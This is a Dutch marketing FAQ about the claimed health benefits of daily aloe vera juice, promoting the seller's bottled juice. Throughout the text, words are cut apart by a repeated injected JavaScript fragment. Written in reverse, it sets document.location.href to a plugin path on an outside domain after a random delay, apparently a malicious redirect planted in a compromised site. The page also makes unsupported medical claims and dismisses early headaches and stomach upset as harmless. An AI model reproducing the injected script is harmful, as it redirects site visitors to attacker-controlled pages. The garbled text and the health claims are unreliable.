Aloë Vera

Veel gestelde vragen over Aloë voordelen m.b.t gezondheid !

Er zijn ontzettend veel voordelen bij het gebruik van dit natuurlijke product. Sommige toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassingen zijn inmiddels ook al wetenschappelijk bewezen. Er zijn vele positieve resultaten door het aantal hoogwaardige stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen die in de plant zitten.

Waarom zou ik iedere dag Aloë Vera moeten drinken?

Je ‘moet’ natuurlijk helemaal niks, maar als je iedere dag Aloë Vera drinkt kan dat een zeer positief effect hebben op je algemene gezondheid. Laten we ze nog even op een rijtje zetten:

#Aloë Vera kan een positieve werking op het functioneren van je darmen hebben, wat een vlotte en vooral efficiënte doorvoer van je darminhoud als gevolg heeft.

#Aloë Vera kan ervoor zorgen dat de ingenomen voedingsstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen sneller worden opgenomen in de bloedbaan.

#Aloë Vera kan een betere balans in je lichaam brengen, met name in je darmflora.
In je darmflora is een correcte balans tussen bacteriën en gisten van groot belang.

#Aloë Vera is al algemeen geaccepteerd als huidverzorgingsproduct. De gel uit de plant bevat een heel breed pallet van voedingsstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen als voeding voor je basiscellen. Direct gevolg is dat je huid gezonder is en elastischer blijft. En….niet onbelangrijk, je huid ziet er veel jonger uit!

#Aloë Vera kan de aanmaak van collageen en elastine verbeteren. Dit is niet alleen belangrijk voor de gezondheid van je huid, maar vooral noodzakelijk voor het bevorderen van het herstellend vermogen van de huid.

#Aloë Vera kan je weerstand verhogen. Dankzij de lange keten van Polysacharide (meervoudige suikerstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffen) kan de weerstand tegen ongunstige bacteriën vanuit de darmflora verhogen.

#Aloë Vera is een bron van mineralen zoals natrium, calcium, kalium, ijzer, chroom, magnesium, koper, zink en mangaan. De plant onttrekt deze mineralen van de rijke bodem, slaat het op in de gel en geeft het op deze manier aan ons door.

#Aloë Vera bevat vele vitaminen zoals vitamine A en vitamine C. Ook een achttal vitaminen uit de B-groep, waaronder de zeldzame vitamine B12 zijn in de gel aanwezig. De meeste van dit soort vitaminen kunnen niet door het lichaam worden opgeslagen, dus is het van essentieel belang om deze dagelijks aan te vullen.

#Aloë Vera geeft je de mogelijkheid om je complete enzymsysteem optimaal te laten functioneren, dankzij het hoge aantal aminozuren die in de gel aanwezig zijn.

Als je al deze voordelen nu ziet, besef je waarschijnlijk dat je een groot gezondheidsvoordeel kunt halen door simpelweg een “borrel” Aloë Vera Juice per dag te drinken.

Aloë Vera in de meest pure vorm kun je via internet bestellen. Als je met Google zoekt op de woorden “Aloë Vera”, krijg je een hele lijst met distributeurs. Gezien de wildgroei van Aloëvera verkoop is het wel belangrijk dat je naar de puurheid en ingrediënten kijkt.

www.natuurlijkfijner.nl heeft een aloëvera juice in glazen fles. Van een uitermate hoge kwaliteit.

In de normale winkels, met name in de cosmetica, kun je veel producten kopen waar Aloë Vera in verwerkt is. Neem altijd de tijd om het etiket te lezen, omdat de gebruikte hoeveelheid Aloë Vera soms zeer minimaal is.

Waarom dat dan zult u zich afvragen? De planten op de biologische plantage zijn tussen de 7 en 10 jaar oud. We gebruiken ieder jaar de buitenste bladeren, die bladeren zijn daarom minimaal 5 jaar oud. Onze sap heeft ook ca 14.000 zonuren gehad,  en er wordt zo min mogelijk extra bewatert, daarnaast een heel goede voedingsbodem. Met al deze kwaliteiten en dan ook nog zonder rare toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegingen in een glazen fles geeft als Eindresultaat: een aloevera juice van toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top kwaliteit J

Sommige mensen voelen al een duidelijke verbetering in 1-4 weken. Maar over het algemeen duurt het langer. Als je begint met Aloë Vera te drinken, doe dit dan voor minimaal 2 maanden.

Zoals bij alle natuurlijke producten moet onze juice na opening in de koelkast bewaard worden.

In de eerste dagen van gebruik kan het voorkomen dat je een lichte hoofdpijn hebt, een rommelende maag of enkele puistjes. Dit is allemaal ongevaarlijk en verdwijnt na een paar dagen weer. Je lichaam is zich aan het aanpassen.

Aloë Vera is ook prima toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepasbaar voor (huis)dieren. Pas de dosering wel even aan, aan het gewicht van het dier, anders kan het een laxerende werking geven.

De Aloë Barbadensis Miller geeft de hoogste kwaliteit. Er zijn ook andere Aloë planten die voor de productie worden gebruikt, maar deze hebben een lagere kwaliteit en worden over het algemeen gebruikt in goedkopere en “duistere”producten. Wij gebruiken de Aloë Barbadensis Miller voor onze producten.